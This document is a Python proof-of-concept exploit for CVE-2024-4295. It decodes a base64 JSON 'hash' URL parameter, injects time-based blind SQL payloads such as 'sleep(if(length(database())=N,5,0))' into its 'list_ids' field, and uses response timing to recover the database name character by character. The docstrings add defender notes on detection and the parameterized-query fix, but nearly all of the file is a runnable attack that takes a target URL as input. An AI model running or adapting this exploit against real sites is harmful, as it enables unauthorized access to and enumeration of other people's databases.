CVE-2024-4295
from urllib.parse import urlparse
import requests as req
import base64
import json
import string
import time
import re
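def parse_hash(url):
    """Decode the base64-encoded JSON carried in a URL's ``hash`` query field.

    The second ``&``-separated field of the query string is taken, the
    ``hash=`` label is stripped from it, and the remainder is
    base64-decoded and parsed as JSON.

    Security note: base64 is an encoding, not an integrity check. Nothing
    in this value is signed, so a client can decode it, change any field
    and re-encode it. A server consuming such a parameter has to treat
    every decoded field as untrusted input.

    Args:
        url: Full URL whose query string carries ``hash=<base64 JSON>``
            as its second field.

    Returns:
        The decoded JSON value (the rest of this script uses it as a dict).

    Raises:
        IndexError: The query string has fewer than two fields.
        ValueError: The field is not valid base64 or not valid JSON.
    """
    # The field is located by position, not by name, so a URL with the
    # parameters in another order is not handled.
    second_field = urlparse(url).query.split("&")[1]
    encoded = second_field.replace("hash=", "")
    # The local is no longer called ``hash``, which shadowed the builtin.
    return json.loads(base64.b64decode(encoded))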
def len_info(url):
    """Probe for the length of the current database name (CVE-2024-4295 PoC).

    This is a time-based blind SQL injection check. Each request replaces
    the ``list_ids`` entry of the decoded ``hash`` JSON with a string that
    makes the database sleep 5 seconds when the guessed length is right.
    The only signal read back is how long the response took.

    For defenders: this traffic appears as a run of near-identical GET
    requests whose ``hash`` parameter decodes to JSON with a non-numeric
    ``list_ids`` entry, one of which takes about 5 seconds longer than the
    rest. Binding ``list_ids`` as integers through a parameterized query on
    the server removes the injection point.

    Args:
        url: URL containing the ``hash`` parameter, as accepted by
            ``parse_hash``.

    Returns:
        The first candidate length whose request took at least 5 seconds.
        The loop has no upper bound and no request timeout, so it does not
        return if no request is ever delayed.
    """
    params = parse_hash(url)
    candidate_len = 0
    while True:
        injected = "2) and (select 1 from (select sleep( if(length(database())={0},5,0) ))x)#".format(candidate_len)
        params['list_ids'] = [injected]
        encoded = base64.b64encode(json.dumps(params).encode()).decode()
        # Swap everything after "hash=" for the re-encoded JSON.
        url = re.sub("hash=(.*)", 'hash=' + encoded, url)
        started = time.time()
        req.get(url)
        elapsed = time.time() - started
        # Wall-clock delay is the only oracle; network jitter of 5 s or
        # more would be read as a match.
        if elapsed >= 5:
            print("Length database: " + str(candidate_len))
            return candidate_len
        candidate_len += 1
def extract(url):
    """Recover the current database name one character at a time (PoC).

    It uses the same time-based blind SQL injection as ``len_info``. For
    each position, candidate characters are tried in turn as a growing
    ``LIKE '<prefix>%'`` pattern placed in ``list_ids``. A response that
    takes at least 5 seconds marks the candidate as accepted.

    For defenders: the request volume is far higher than in the length
    probe, up to one request per candidate character per position, all
    against the same endpoint with only the ``hash`` value changing.
    Rate anomalies and repeated ~5 second responses on that endpoint are
    the observable indicators.

    Args:
        url: URL containing the ``hash`` parameter, as accepted by
            ``parse_hash``.

    Returns:
        None. Progress is printed after each accepted character.
    """
    params = parse_hash(url)
    recovered = ''
    alphabet = string.ascii_lowercase + string.digits + string.punctuation
    # The length probe runs once, against the URL as originally supplied.
    for _ in range(0, len_info(url)):
        for ch in alphabet:
            injected = "2) and (select 1 from (select sleep( if(database() like '{0}%',5,0) ))x)#".format(recovered + ch)
            params['list_ids'] = [injected]
            encoded = base64.b64encode(json.dumps(params).encode()).decode()
            url = re.sub("hash=(.*)", 'hash=' + encoded, url)
            started = time.time()
            req.get(url)
            elapsed = time.time() - started
            if elapsed >= 5:
                recovered += ch
                print("Database: " + recovered)
                break
# Script entry: read the target URL interactively, show the decoded
# ``hash`` JSON so the operator can see which fields the link carries,
# then start the timing probe.
url = input("url: ")
info_hash = parse_hash(url)

print("=" * 20)
print('Information hash: ')
for field, value in info_hash.items():
    # JSON object keys are always strings, so this matches key + ": " + str(val).
    print(f"{field}: {value}")
print("=" * 20)

extract(url)